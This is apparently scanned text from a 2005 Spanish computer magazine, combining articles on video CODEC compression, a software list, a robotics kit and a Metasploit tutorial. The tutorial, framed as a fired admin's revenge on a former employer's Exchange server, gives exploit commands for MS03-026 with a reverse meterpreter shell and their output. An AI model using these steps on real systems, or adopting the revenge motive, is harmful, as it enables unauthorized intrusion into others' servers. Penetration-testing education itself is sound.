En cuanto a las películas, hoy en día son muchos los que prefieren comprar una PC con lectora de DVD y salida a TV en vez de un reproductor hogareño. Y no sólo eso, sino que también se han hecho muy populares CODECs como DivX y XviD, que tienen un alto grado de compresión y permiten grabar más de una hora de video con buena calidad en menos de 1 GB, lo cual los hace aptos para transportar video en Internet y de PC a PC. Ahora bien, ¿cómo funcionan los CODECs? De esto hablaremos en las páginas que siguen. Para empezar, comentaremos los fundamentos de la codificación de video en formato digital y, luego, hablaremos sobre la necesidad de comprimir la información, sin olvidar, obviamente, cómo realizan su tarea los CODECs más populares.

TRANSMISION DE VIDEO Hay muchas razones por las que es necesario comprimir la información que contiene un video. La primera de ellas tiene que ver con la transmisión de la información a través de distintos medios, ya sean cableados o por aire. Tomemos por caso la televisión: en sistemas PAL, la transmisión se realiza a una tasa de 25 cuadros por segundo (frames per second), en tanto que los sistemas NTSC transmiten a 30. Estos sistemas son entrelazados, es decir que se divide la pantalla en una cierta cantidad de líneas (625 en un caso, 525 en el otro) y se transmite cada cuadro en dos tandas: primero, las líneas pares y luego, las impares. Para lograr esa velocidad de 25 o 30 fps se necesitará, entonces, una frecuencia de 50 o 60 Hz. Esto tiene una cierta relación con la conexión de red eléctrica que adopta cada país; por ejemplo, en la Argentina se usa una tensión de 220 V a 50 Hz y se utiliza la norma PAL, mientras que en México se 23


22-33_Notapa-P26.qxd

11/2/05

5:03 PM

tiene una tensión de 120 V a 60 Hz y se usa la norma NTSC. Pensemos que se debe transmitir un cuadro cada 30 o 40 ms, un tiempo bastante escueto y que obliga a buscar el mejor aprovechamiento posible de la señal. Por lo tanto, aquellos encargados de diseñar los sistemas de televisión y de tratamiento de video realizaron innumerables cálculos basándose en las limitaciones del ojo humano para optimizar de la mejor manera el flujo de la información. Se decidió, entonces, utilizar una codificación basada en tres canales, de cuya combinación surge en pantalla la representación de cualquier color visible. Estos canales son rojo (R), verde (G) y azul (B), y son los que se tratan comúnmente en las paletas de colores de los programas de diseño, además de ser los que emplean las cámaras para tomar la información que capturan.

RGB Y YUV Sin embargo, el formato RGB no se adoptó para la transmisión de datos, ya que cada color (con una profundidad de 8 bits, es decir, con 256 niveles distintos) ocupa un ancho de banda de 5 MHz, lo cual totaliza 15 MHz. En cambio, se implementó el formato YUV, también de tres canales, pero con un ancho de banda de tan sólo 7 MHz. Este sistema tiene una codificación muy interesante, de dos componentes: luminancia (brillo) y crominancia (cantidad de color). La primera (que corresponde a Y) surge de la suma algebraica de la intensidad de cada color (que va de 0 a 1) en la siguiente proporción: Y = 0,299R + 0,587G + 0,114B. La segunda contiene información sobre el color, y está comprobado que influye menos en la calidad visual percibida por

Page 24

nuestros ojos. Está subdividida en U y V, las cuales tienen como valor la resta entre la intensidad de un color (azul y rojo, respectivamente) y la luminancia. El valor del color restante (verde) puede calcularse por combinación lineal de las señales Y, U y V, de modo que se ahorra el envío de una señal. Así, la luminancia ocupa un ancho de banda de 5 MHz, en tanto que la crominancia usa 1 MHz por canal. Además, algo positivo es que se mantiene compatibilidad con los sistemas monocromáticos, puesto que en éstos, simplemente, se ignora la información referente a la crominancia y se obtiene la imagen en escala de grises. Todo este tema del sistema YUV nos interesa, fundamentalmente, por un concepto llamado subsampling, que consiste en tomar menos muestras de la crominancia que de la luminancia, para ahorrar ancho de banda sin perder demasiada calidad. Esto significa que, de x píxeles muestreados, se transmiten x de luminancia, y de crominancia en el campo superior (líneas pares) y z de crominancia en el inferior. Estos valores guardan una cierta relación (x:y:z), que, típicamente, va de 4:4:4 (muestreo normal) a 4:2:0 o 4:1:1.

EL VIDEO EN LA PC La compresión de video es importante no sólo para la captura y la transmisión, sino también para la digitalización de los datos que serán tratados en la computadora. Por lo general, se emplean resoluciones máximas de 720 x 576 para capturas en la norma PAL, y de 720 x 480 en NTSC (esto es lo que se usa, por ejemplo, para el DVD). Si consideramos un mapa de bits (la forma más sencilla de representar las

imágenes en las computadoras) con una profundidad de 24 bits, cada cuadro en pantalla ocupará 9.953.280 bits (720 x 576 x 24), es decir, 1,186 MB. Por segundo, como hay 25 cuadros, estaríamos trabajando con 29,65 MB. De más está decir que resultaría imposible almacenar una película completa de esta forma, ¿no? El problema no está sólo en el espacio ocupado, sino también en el flujo de información que debe procesar la computadora. Pensemos que, en este caso, habría que pasar, del medio de almacenamiento a la memoria, y de la memoria al procesador, casi 30 MB de datos por segundo, algo muy difícil de lograr con equipos normales. Así que, de alguna manera, se debe comprimir esa información para que pueda reproducirse en tiempo real. Y aquí es donde entra en juego el concepto de CODEC (COmpresor-DEScompresor o COdificador-DECodificador, según cómo se lo mire). Los CODECs son algoritmos que se utilizan para comprimir la información (lo cual genera una codificación especial), y que sirven, también, para restaurarla a su estado anterior. Hace algunos meses, en POWERUSR #16 y #19, analizamos algunos formatos de compresión de gráficos y de sonido. Entonces, dijimos que existían algoritmos de compresión lossy (que pierden información al restaurar) y lossless (que mantienen intacta la información). Si bien lo ideal es no perder nada de información (para mantener una óptima calidad), los CODECs que solemos usar son lossy, puesto que son los que mejor permiten comprimir la información. Luego de hacer toda esta introducción, ya estamos capacitados para empezar a hablar sobre los CODECs propiamente dichos.

DIFERENCIAS ENTRE DISTINTAS ESCALAS DE SUBSAMPLING

4:1:1

24

4:2:0

4:2:2

4:4:4

POWERUSR


22-33_Notapa-P26.qxd

11/2/05

5:03 PM

Page 26

MPEG PARA COMENZAR EL RECORRIDO POR LOS CODECS MAS IMPORTANTES, ANALIZAREMOS LAS DISTINTAS VARIANTES DE MPEG, UN CLASICO ALGORITMO DE COMPRESION DE AUDIO Y VIDEO EN EL CUAL SE BASA LA MAYORIA DE LOS FORMATOS POPULARES. Creo que todos nuestros lectores han oído hablar de MPEG, al menos, en algunas de sus variantes. Este formato surgió ante la necesidad (a fines de la década de 1980) de definir un estándar para la compresión digital de señales audiovisuales, y, ciertamente, ha tenido gran éxito, puesto que aún en la actualidad se sigue utilizando. La primera versión, hoy conocida como MPEG-1, es la base del Video CD, y también del popular formato de audio MP3 (de hecho, estas siglas significan MPEG Audio Layer 3). La segunda, MPEG-2, se usa en los DVDs y en la HDTV (High Definition Television, televisión de alta definición), que ha comenzado a surgir en los últimos tiempos. La tercera, MPEG-3 (pensada para HDTV), fue la única que fracasó, puesto que no ofreció mejoras significativas frente a la anterior. La cuarta y última hasta la actualidad es MPEG-4, que es el CODEC en el cual se basan los populares DivX, XviD y 3ivx. En estas páginas nos encargaremos de analizar estos formatos.

pa muchísimo menos espacio que un cuadro entero, por lo cual el flujo de datos es mucho menor. Sin embargo, también se requerirá un mayor poder de procesamiento por parte del decodificador (ya que su trabajo no consistirá sólo en recibir un cuadro y reproducirlo tal cual, sino que deberá procesar todas las instrucciones para reconstruir las imágenes) y, además, se pueden producir diversos inconvenientes al comprimir videos con mucho movimiento. Por ejemplo, en el caso del noticiero o de un dibujo animado de animé, como Caballeros del Zodíaco, podrían tomarse pocos key frames sin sufrir demasiado; pero en carreras de Fórmula 1, seguramente, habrá que tener más cuidado al usar esta técnica.

FORMAS DE COMPRIMIR VIDEO

Una de las claves de la compresión MPEG es el análisis exhaustivo de la contribución de cada parte de la imagen a la original. Es decir, lo que se hace es dividir cada cuadro en muchos bloques, y definir cuánto aporta cada uno al original, de manera que se puedan obviar ciertas partes de los bloques sin sufrir grandes pérdidas. En MPEG, los cuadros se dividen en bloques de 8 x 8 píxeles de 8 bits. Mediante la transformada del coseno (que es una fórmula matemática algo compleja), se genera un nuevo bloque de 8 x 8 con coeficientes de 11 bits. Cada coeficiente representa la “importancia” del píxel, de modo

Vamos a comenzar analizando los principios que se utilizan comúnmente para reducir el flujo de datos. La idea es quitar toda la información redundante, es decir, buscar patrones que nos permitan evitar el envío de datos. De este modo, sólo tendremos que transmitir instrucciones que indiquen cómo hacer para que la imagen percibida luego de la decodificación sea igual que la original. Hay dos tipos de redundancias que se consideran normalmente en la compresión de video: espaciales y temporales y psicovisuales. Las primeras se refieren a que cada píxel que conforma una imagen de video tiene una cierta dependencia de los aledaños; por ende, se puede predecir su valor tomando un promedio de los que lo rodean, lo cual nos evita tener que transmitir la información referida a él. Las segundas tienen más que ver con las limitaciones del ojo humano para interpretar los colores, reduciendo la paleta de forma tal, que no se puedan apreciar mayores diferencias. En MPEG se usan dos técnicas especiales basadas en estos principios: una es la predicción compensada por movimiento (que se basa en analizar una sucesión de cuadros), y la otra es la transformada discreta del coseno (DCT, Discrete Cosine Transform), que analiza la información exclusivamente dentro de un cuadro.

PREDICCION COMPENSADA POR MOVIMIENTO Del inglés motion-compensated inter-frame prediction, esta técnica trata de predecir un cuadro en base a otro anterior, tomado como referencia. El funcionamiento de este método puede explicarse fácilmente mediante un ejemplo. Supongamos que estamos codificando un programa de noticias, en el que, simplemente, se muestra al cronista relatando (o, mejor dicho, leyendo). Entre un cuadro y otro, habrá muchos componentes que se mantendrán en la misma posición: el fondo, el escritorio y muchas partes del cuerpo del periodista (excepto la boca). Entonces, es posible comprimir mucho la información si sólo se transmiten algunos cuadros completos (digamos, uno de cada 200) y las instrucciones necesarias para reconstruir la imagen de los demás cuadros en base a los primeros. A estos cuadros importantes se los denomina cuadros clave o key frames. Como se pueden imaginar, un simple conjunto de instrucciones ocu26

TRANSFORMADA DISCRETA DEL COSENO

MOTION JPEG Relacionado con MPEG, está JPEG, un grupo similar que se ocupó de la estandarización de un formato de compresión de imágenes. La forma de comprimir de JPEG es parecida a la de MPEG, especialmente porque se basa en la transformada discreta del coseno, de la que hablamos aquí. Existe un sistema de video llamado M-JPEG (Motion JPEG), basado en un concepto muy sencillo, que es, simplemente, utilizar varias imágenes comprimidas en el formato JPEG para representar movimiento; algo así como los GIF animados, pero con una velocidad de 25 o 30 imágenes por segundo. Naturalmente, M-JPEG comprime mucho menos que MPEG (ya que no tiene en cuenta la predicción compensada por movimiento), pero puede ser útil en determinados casos. Por ejemplo, se puede acceder a cualquier parte del video con mayor facilidad que en MPEG (puesto que no hay key frames y, por lo tanto, no hace falta realizar muchos cálculos para decodificar el cuadro en cuestión). Además, no tiene los problemas de MPEG cuando se producen movimientos bruscos entre un cuadro y otro.

POWERUSR


22-33_Notapa-P26.qxd

11/2/05

5:03 PM

Page 27

tal que se pueden despreciar aquellos píxeles que tengan un coeficiente cercano a cero, lo que ahorra datos en el flujo que se va a transmitir. Por supuesto, la precisión de los coeficientes estará relacionada con la calidad de la imagen de salida. De esto depende la cuantización, concepto por el cual se puede ir reduciendo la cantidad de bits por transmitir a fin de ajustar la relación calidad/tamaño según se desee según las necesidades. Ahora bien, ¿cómo transmite el codificador esta información al decodificador? Lo hace escaneando cada bloque en zigzag (ya que, por lo general, los coeficientes despreciables están del sector inferior derecho), como se muestra en la figura correspondiente. Los datos sobre los coeficientes se transmiten en serie. Por ejemplo, observando la figura, podríamos decir que los datos serían (aproximadamente): 10, 5, 5, 0, 2, 3, 0, 0, 0, …, 0. Es posible evitar la transmisión de todos esos ceros, simplemente, dando un código de finalización de bloque (EOB, end of block), lo que da como resultado: 10, 5, 5, 0, 2, 3, EOB. Así, en este ejemplo, debimos transmitir solamente 7 coeficientes de 11 bits (77 bits) en vez de 64 píxeles de 8 bits (512 bits). Esto es una compresión de 6:1, algo típico para MPEG-1.

MPEG-1 Como acabamos de decir, la compresión del MPEG original es de 6:1. Pensado en un principio para reemplazar el VHS, la idea es proveer de una calidad similar a este formato analógico, con una tasa máxima de transferencia para video de 1,5 Mbps

TIPOS DE IMAGENES EN MPEG-2 En el estándar MPEG-2 se pueden definir los cuadros en tres tipos distintos, que sirven para determinar diferentes clases de predicción de acuerdo con las necesidades. De esta forma, es posible optimizar la velocidad de decodificación y la calidad de la predicción, con lo cual se obtiene un mejor rendimiento. ■ Intra (I): se codifican puramente en base a ellas mismas; es decir, no se toma ninguna otra imagen como referencia. ■ Predictivas (P): son codificadas basándose tanto en ellas mismas como en referencias anteriores, haciendo uso de la máxima compresión. También, pueden servir como referencia para futuras imágenes. ■ Bidireccionales (B): para su codificación pueden usarse imágenes tanto pasadas como futuras, con lo cual se obtiene la mejor relación de compresión. Obviamente, será necesario contar con algún buffer en el codificador y en el decodificador, que permita reordenar las imágenes a fin de conseguir esta información.

POWERUSR

TRANSFORMADA DEL COSENO Bloque de 8 x 8

Bloque transformado DCT x

8 x 8 DCT 8 x 8 IDCT

y AQUI PODEMOS OBSERVAR LA MATRIZ DE LOS COEFICIENTES DE LA DCT, QUE SE CONCENTRAN, PRINCIPALMENTE, EN EL ORIGEN DE COORDENADAS.

(188 KB/s) y 192 Kbps (24 KB/s) para audio en estéreo. Con esta calidad, es posible almacenar una película completa de dos horas de duración en dos CDs estándar. La resolución empleada es de 352 x 288, con un muestreo de 172 x 144 para la crominancia. Esto explica un poco que las películas en Video CD tengan un color más “opaco” que las que vemos en formatos más actuales. En la figura ubicada en la parte superior de la siguiente página, se puede observar la estructura del proceso de codificación y de decodificación MPEG, que combina la transformada discreta del coseno (DCT) con la predicción compensada por movimiento. En el primer cuadro, el codificador realiza la DCT y la cuantización (Q) de la misma, para luego enviarlo directamente al decodificador. Además, el mismo codificador decodifica el cuadro generado, realizando la cuantización inversa (IQ) y la antitransformada discreta del coseno (IDCT), a fin de usarlo para realizar la predicción. Es importante que la predicción se haga con la imagen ya decodificada, puesto que si se hace con la original (no comprimida), se pueden cometer muchos errores, debido a que la información no es exactamente iguales.

MPEG-2 La segunda revisión de MPEG se lanzó a fines de 1994, y empezó a utilizarse un par de años más tarde, con el advenimiento del DVD que hoy todos conocemos. En realidad, la forma de comprimir del MPEG-2 no difiere mucho de la del MPEG-1, puesto que se siguen utilizando los mismos principios explicados líneas atrás. Sin embargo, hay algunas diferencias notorias en cuanto al flujo de datos: el video puede tener una tasa de hasta 30 Mb/s (3,75 MB/s), mientras que el audio goza de nuevas propiedades, como el uso de seis canales en vez de dos. Una de las ventajas significativas es que el flujo de datos puede no ser constante (CBR, Constant Bit Rate), sino que es capaz de variar de acuerdo con las necesidades de un cuadro determinado (VBR, Variable Bit Rate). Por ejemplo, en escenas donde hay muchas partes negras (como cuando comienza la presentación de una película), se necesitará una menor cantidad de datos para codificar y decodificar la imagen, con respecto a otra más “colorida”. La estructura de CODEC de MPEG-2 es similar a la expuesta en el diagrama de bloques de MPEG-1, aunque deberíamos agregar una etapa de codificación de longitud variable (al final del equipo o algoritmo codificador) y de decodificación de longitud variable (al principio del decodificador). Es importante destacar que MPEG-2 no 27


45-Powerzone-P26.qxd

11/8/05

18:05

Page 21

POWER.TECTIMES.COM

EXCLUSIVO LECTORES

COMPRANDO ESTA REVISTA SE OBTIENE DERECHO DE ACCESO A POWER ZONE, EL AREA EXCLUSIVA EN INTERNET PARA LOS LECTORES. ESTE MES ENCONTRARAN LOS SIGUIENTES PROGRAMAS SELECCIONADOS Y COMENTADOS POR NUESTRO EQUIPO. LOS SUSCRIPTORES

POWERZONE

DE LA REVISTA RECIBEN UN CD-ROM CON ESTE MATERIAL. DESARROLLO WEB: ACEMenu Creator 3.3.3

+ Antenna 2.5.105 + Astro 1.0 + Effective Site Studio 3.0 + EzGenerator Website Builder 2.0.140 + Iron Speed Designer 3.0 + Mobile Converter 1.0.2 + RessWork 3.5 + SiteXpert Professional Edition 8.0.1 FILE TOOLS: Broken Cross Disk Manager 3.71.2103 + Chop 1.502 + Compare It! 3.81 + Directory Splitter 1.0 + Disk Recon 3.1 + FileAnt 1.0 + Google Desktop Search 1.0 + Recover My Files 3.70 + SizeExplorer Pro 3.6 FREEWARE: Advanced WindowsCare 1.0 + All-in-One Secretmaker 4.2.1 + Avi2Dvd 0.3.4 + BitSpirit 3.1.0.077 + Context Magic 1.1 + IrfanView 3.97 + Restart 1.55 + SmartFTP 1.5.990.19 + X-Fonter 5.4 HDTOOLS: DiskTT 1.2.9 + DriveGLEAM 1.0 +

FolderInfo 2.17.2 + HDDlife 2.5.70 + HDD Regenerator 1.51 + PerfectDisk 7.0 + PowerOffice Express 1.0.4 + WinImage Standard 7.0 INTERNET: cFos Speed 2.12 + ICQ 5.04 +

Macromedia Flash Player 8.0 + Messenger Plus! Extension 3.60.144 + MSN Messenger 7.5.0306 + Opera 8.5 + SilentNight Radio 1.0 MULTIMEDIA:

Abrosoft FantaMorph 3.1 + Ashampoo Movie Shrink 2 2.11 + CollageMaker 1.3 + FLV Player

POWERUSRUSR

1.2.2 + Foobar2000 0.9 + Opanda DigitalFilm 1.68 + Picasa 2.1.0 + Song List Creador 2.1.1.31973 + ViPlay 2.09

IRON SPEED DESIGNER 3.0

+

Herramienta de desarrollo de software para crear aplicaciones basadas en la tecnología .NET. Podremos realizar aplicaciones web muy atractivas sin necesidad de escribir una sola línea de código. Para el desarrollo de páginas web trae un completo ayudante que nos facilitará el diseño.

NETWORKING: Acid Scanner 1.0 + Alchemy Eye

7.3 + Alejandría Open&Play 1.0 + AnalogX Proxy 4.14 + Network LookOut Administrator 1.7.2 + Perfect Admin 1.0 + VisualRoute 2005 + WebPartner Test Center 3.00.308 RIPPERS: #1 DVD Ripper 1.3.44 + Alcohol 120% 1.9.2.1705 + CD to WAV/MP3 Ripper 2.0 +DVD Decrypter 3.5.4.0 + DVD To MP3 Ripper 3.0.0.2 + Easy CD Ripper 2.14 + ImTOO Ripper Pack 1.0 + Xilisoft DVD Audio Ripper 2.0.55.823 SEGURIDAD: Access Denied XP 1.0.1 + East-

Tec DisposeSecure 3.3 + Microsoft AntiSpyware 1.0.615 + Multi Virus Cleaner 2005 3.9.0 + NOD32 Anti-Virus 2.50.39 + PC Security Test 2005 3.6.0 + PreEmpt 2.0 + Sys_Keylog 1.1 TOOLS: HWiNFO32 1.55 + Kamzy Process Watcher 1.0 + MagicTweak 3.0 + Microsoft AutoPlay Repair + Wizard 1.0 + Nero Burning ROM 6 6.6.0.16 + Paragon CD-ROM Emulator 3.0 + Winrar 3.51 + ZenKEY 1.5.1 TWEAKING: Intelli HyperSpeed 2005 1.5 +

Outlook Express Tweaker 1.01 + PC Adrenalin 1.0 + Rage3d Tweak 1.0 + TuneUp Utilities 2006 5.0.2331 + TweakLite Assorted 1.0 + TweakMASTER Pro 2.0 + Tweak Ram 5.29

POWEROFFICE EXPRESS 1.0.4

+

Con este programa podremos tener un disco virtual de 1 GB de tamaño que podremos compartir con cualquier persona en el mundo. Obviamente deberemos poseer una conexión a Internet, preferentemente de banda ancha. Acceder a este disco es muy sencillo: sólo tendremos que poner nuestro nombre de usuario y listo. Es extremadamente útil para no portar CDs, disquetes o ZIPs.

TWEAKMASTER PRO 2.0

+

Herramienta creada para agilizar todos los procesos que hagan uso de la conexión a Internet. Optimiza la conexión mediante cambios en Windows, siendo capaz de realizar una notoria mejora en ADSL o dialup. Uno de los aspectos sobresalientes de este programa es el acelerador DNS.

21


60-62-Redes-P26.qxd

11/2/05

2:05 PM

Page 60

LEANDRO F. REOX

.hck

ESPECIALISTA EN REDES Y SEGURIDAD

leandro.reox@gmail.com

MUCHOS DIRAN QUE ES UN POCO DESACTUALIZADO, PERO TODOS SABEMOS QUE DEL LADO DE LOS SERVIDORES TAMBIEN TENEMOS EQUIPOS ABIERTOS AL MUNDO ESPERANDO SER EXPLOTADOS. ESTE ARTICULO ES UN POC (PROOF OF CONCEPT, O PRUEBA DE CONCEPTO) PARA DEJAR MAS QUE CLARO EL PELIGRO QUE CORREN LOS SERVIDORES QUE NO TIENEN LA PROTECCION ADECUADA NI PARCHES.

« THE METASPLOIT PROJECT PROBANDO VULNERABILIDADES

n nuestra edición #24 hicimos un completo informe acerca de los exploits a través de la historia, y finalizamos hablando sobre los frameworks de explotación, herramientas que sirven para realizar testeos de penetración; esto quiere decir que “simulan” una situación de hacking para comprobar si un servidor es vulnerable. En aquella edición, prometimos que analizaríamos un ejemplo en una situación cotidiana, para observar el funcionamiento y el poder de Metasploit (www.metasploit.com), y eso es lo que haremos ahora. Recomendamos repasar lo publicado en POWERUSR #24, para tener una idea más “teórica” sobre este asunto.

E

LA SITUACION Termina nuestro día de trabajo en la oficina y, contentos, nos vamos a casa pensando en la cena y la almohada. Justo cuando estamos soñando sobre cómo asesinar a Pablo Hauser con un fuego a discreción de municiones de paintball, suena el teléfono y adivinen qué: sí, problemas. Nos vestimos y acudimos a la oficina para resolverlos. Luego de varias horas, cuando ya creíamos que estaba todo perdido, nos invade esa iluminación que sólo puede tener un administrador con pocas horas de sueño, y terminamos por arreglar todo. Al día siguiente, en la oficina, nuestro gerente nos invita a su despacho y nos comunica que quedamos desafectados de la compañía a raíz del incidente sucedido (que, al margen, no había tenido nada que ver con nosotros), y no sólo eso, sino que tiene cara para presentarnos a quien nos reemplazará: “Te presento a Mr. Exchange; él va a tomar tu lugar y, además, como es megacertified, va a implementar una plataforma de e-mail superpoderosa como la que no tuvieron jamás en la historia”. Sabiendo esto, volvemos cabizbajos a nuestra casa pensando qué será ahora de nuestras vidas. Pero, como es natural en el ser humano, empezamos a recordar todas las situaciones en las que nuestro gerente nos engañó, presionó, culpó y prometió un aumento millonario que jamás llegó. Comenzamos, entonces, a planear nuestra venganza.

Metaesploit!!! + — —=[ msfconsole v2.4\ [75 exploits - 75 payloads] msf >

¡Bien! Estamos adentro y tenemos prompt para empezar a ejecutar cosas, pero… ¿qué hacemos? Cuando comenzamos a familiarizarnos con Metasploit, lo primero que debemos hacer es listar los exploits disponibles, para ver cuál se ajusta a nuestras necesidades. Esto se hace mediante el comando “show exploits”. Ahora que tenemos una lista de los exploits disponibles, podemos ver cuál es el mejor para ocasionarle un dolor de cabeza al nuevo administrador o, por lo menos, para monitorear la actividad del servidor de correo e, incluso, alterar el contenido de los mails de nuestro ex gerente. Hacemos un scanning: Nmap – sV -0 –p25,139 $ip-del-exchange

Comprobamos que Exchange tiene permitidos los puertos de NetBIOS desde Internet y que, además, no cuenta con los parches críticos. Sí, amigos: una instalación por default. Entonces, nuestro mejor amigo es el exploit para vulnerabilidad RPC (la misma que ataca el Blaster). Para utilizar éste, o cualquier exploit, necesitamos llamar al comando “use” seguido del nombre que figura a la izquierda cuando hacemos “show exploits”. Entonces: msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026 >

CONFIGURAR EL EXPLOIT Una vez que seleccionamos el exploit, debemos configurarlo con el comando “set” (que modifica la variable de entorno del exploit que estamos ejecutando en ese momento). Si vamos a intentar múltiples exploits, lo más recomendable será utilizar el comando “setg”, ya que hace la configuración de manera global, un Payload, que podemos entender

SED DE VENGANZA

C:\Program Files\Metasploit Framework>msfconsole.bat 60

«

Luego de un pequeño trabajo de investigación y scanning, descubrimos que, evidentemente, nuestro reemplazo había instalado ese Exchange que tanto había prometido. Buscando, encontramos que Metasploit puede ser la solución a nuestro sufrimiento y que, con un poco de suerte, podríamos perpetrar nuestra venganza. Descargamos de la Web el binario instalador para Windows, y con cuatro o cinco clics, lo tenemos listo y corriendo. Ahora, al mejor estilo old school, nos dirigimos a un “cmd” para ejecutar el framework por primera vez:

ESTA ES LA CONSOLA QUE UTILIZAMOS SI REALIZAMOS LA EXPLOTACION A TRAVES DE LA LINEA DE COMANDOS, QUE ES UNA DE LAS FORMAS DE OPERAR DEL FRAMEWORK METASPLOIT. POWERUSR


T

60-62-Redes-P26.qxd

11/2/05

2:05 PM

Page 61

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse_meterpreter PAYLOAD -> win32_reverse_meterpreter

Lo seteamos en modo reverso, para que la conexión se origine desde la víctima a nosotros, con lo cual podremos evadir las restricciones de políticas entrantes de firewalling. El siguiente paso es setear las variables de entorno locales, como la dirección IP de la víctima (RHOST), el puerto remoto (RPORT), la IP de nuestra máquina (LHOST) y el puerto local (LHOST), del siguiente modo: msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set RHOST $ipdelserver RHOST -> 127.0.0.1 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set RPORT 12345 RPORT -> 12345 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set LHOST 127.0.0.1 LHOST -> 127.0.0.1 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > set LPORT 5556 LPORT -> 5556 msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) >

¡QUE COMIENCE LA ACCION! Una vez que todas las variables de entorno están configuradas, es hora de darle al gatillo, simplemente, con el comando “exploit”: msf msrpc_dcom_ms03_026(win32_reverse_meterpreter) > exploit [*] Starting Reverse Handler. [*] Sending 270 bytes to remote host. [*] Got connection from 127.0.0.1:5556 <-> $ipdelserver:2029 [*] Sending Stage (2835 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter>

Tenemos una shell de meterpreter en el host remoto: la explotación fue todo un éxito. El próximo paso es ver qué tiene meterpreter para ofrecernos, cosa que podemos ver con el comando “help”. La función de este intérprete que más se utiliza es “use”, la que, justamente, nos permite cargar extensiones en el host remoto en memoria “on the fly”, a lo ninja. Desde aquí tenemos extensiones que nos dan la posibilidad de controlar la función POWERUSR

«

como el “código arbitrario” que se ejecutará en la máquina víctima. En este caso, usamos “meterpreter”, que, a simple vista, parece un típico intérprete de comandos, pero es mucho más que eso: tiene la capacidad de manejar una carga de objetos en memoria on-the-fly, debido a lo cual puede controlar extensiones que son compatibles con la mayoría de las plataformas de sistemas operativos. De esta manera, el intérprete puede utilizar una misma interfaz cliente y controlar múltiples extensiones. Entonces, ahora seteamos como payload al meterpreter, de la siguiente manera:

RESULTADO DEL COMANDO “SHOW EXPLOITS” EN LA CONSOLA DE METASPLOIT, QUE MUESTRA LOS EXPLOITS DISPONIBLES PARA REALIZAR LAS EXPLOTACIONES.

“kill” de procesos, así como también, de obtener una lista de los que estén corriendo en ese momento en la máquina víctima, llamando al siguiente comando: meterpreter> use -m Process 25 loadlib: Loading library from ’ext950591.dll’ on the remote machine. meterpreter> loadlib: success. meterpreter>

Perfecto, la librería se cargó con éxito en el equipo remoto. Una vez que está cargada, podemos ver qué comandos podemos manejar correspondientes a la extensión; una vez más, un “help” nos será de gran ayuda.

EJECUCION DE COMANDOS EN EL EQUIPO REMOTO En el último submenú de este nuevo menú de ayuda, tenemos todos los comandos que podemos ejecutar relacionados con la extensión cargada. Vamos a ejecutar una shell de Windows en el equipo remoto a través de meterpreter. Para hacerlo, nos valemos de “execute”: meterpreter> execute -f cmd -c execute: Executing ’cmd’... meterpreter> execute: success, process id is 3516. execute: allocated channel 1 for new process.

Ahora tenemos creado el “canal 1” para este nuevo proceso. La versatilidad de meterpreter nos permite manejar la ejecución de distintas rutinas por canales, y controlarlas de manera individual. Lo que hacemos, entonces, es conectarnos al canal 1 abierto recientemente por meterpreter con el comando “interact”: meterpreter> interact 1 interact: Switching to interactive console on 1... meterpreter> interact: Started interactive channel 1. Microsoft Windows [Version 5.1.2600] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS>echo Lean loves to own M$ boxes ! :D echo Lean loves to own M$ boxes ! :D Lean loves to own M$ boxes ! :D C:\WINDOWS> 61


56-57-Robotica-P26.qxd

11/7/05

17:38

Page 56

GONZALO MON / GONZALO ZABALA

.rob

DESARROLLADORES DE ROBOTS Y AUTOMATAS

gonzalo@mon.com.ar / gonzalo.zabala@vaneduc.edu.ar

«

LA ROBOTICA, AL ALCANCE DE TODAS LAS EDADES

EN LA EDICION ANTERIOR, COMENTAMOS DOS POPULARES KITS DE ROBOTICA LATINOAMERICANOS, PERO NOS QUEDO POR VER BLOCKY-TRONIC, UN PARTICULAR KIT DESARROLLADO INTEGRAMENTE EN LA ARGENTINA, DESTINADO AL APRENDIZAJE. VEAMOS DE QUE SE TRATA.

BLOCKY-TRONIC ControlBot y VisualBot

a familia BLOCKY-TRONIC consta de diferentes modelos de kits de robótica con fines recreativos y educativos. Están dirigidos a niños mayores de 7 años, con el objetivo de iniciarlos en la robótica y la programación. Si bien sus características y prestaciones son similares a las de algunos equivalentes importados, su precio es mucho más accesible. Por otra parte, tanto el hardware como el firmware y el software fueron desarrollados íntegramente en la Argentina.

L

Las piezas principales, como la microcomputadora, los motores y los sensores, ya vienen interconectadas de modo que no requiere que el usuario haga ninguna conexión. Simplemente, debe ensamblar la configuración del robot deseado (ya sea alguna de las ilustradas en los manuales o alguna que él mismo cree), para lo cual tiene a su disposición cientos de ladrillitos de encastre de distintos tipos, tamaños y colores, como así también ruedas y orugas. Una vez armado el robot, y luego de encenderlo, selecciona por medio del sensor táctil la función deseada, para ver cómo la creación cobra vida. Entre las funciones que se pueden seleccionar están algunos de los casi 30 programas que trae incorporados en su memoria ROM, o bien la creación de sus propios programas, que se pueden almacenar en la memoria RAM.

CARACTERISTICAS FISICAS Y ELECTRONICAS Los kits BLOCKY-TRONIC se presentan en dos versiones. La más completa, denominada Microcomputer 3.0, cuenta con dos motorreductores ya ensamblados, capaces de impulsar ruedas u orugas para dar locomoción a los robots. Para interactuar con el usuario, tiene dos LEDs de distintos colores y un buzzer que emite diferentes tipos de sonidos. Con el fin de reconocer y recavar información del entorno, dispone de un sensor táctil, uno de luz (fotosensor) y uno de sonido. El “cerebro” del sistema es un microcontrolador de la marca Microchip, de la línea PIC16F84. La placa cuenta con un conector de expansión por medio del cual el robot se conecta al puerto serie de la PC (ya sea con el cable provisto en el kit o bien mediante accesorios adicionales). El conjunto se alimenta con sólo cuatro pilas AA.

« DIFERENTES VARIANTES DEL KIT BLOCKYTRONIC EN EL MERCADO.

56

CD-ROM Cable de conexión

«

COMO FUNCIONA

Guía de uso, armado y programación

Microcomputadora

Motores

Sensores y LEDs

ESTOS SON LOS COMPONENTES BASICOS QUE SE ENCUENTRAN EN LOS KITS BLOCKY-TRONIC.

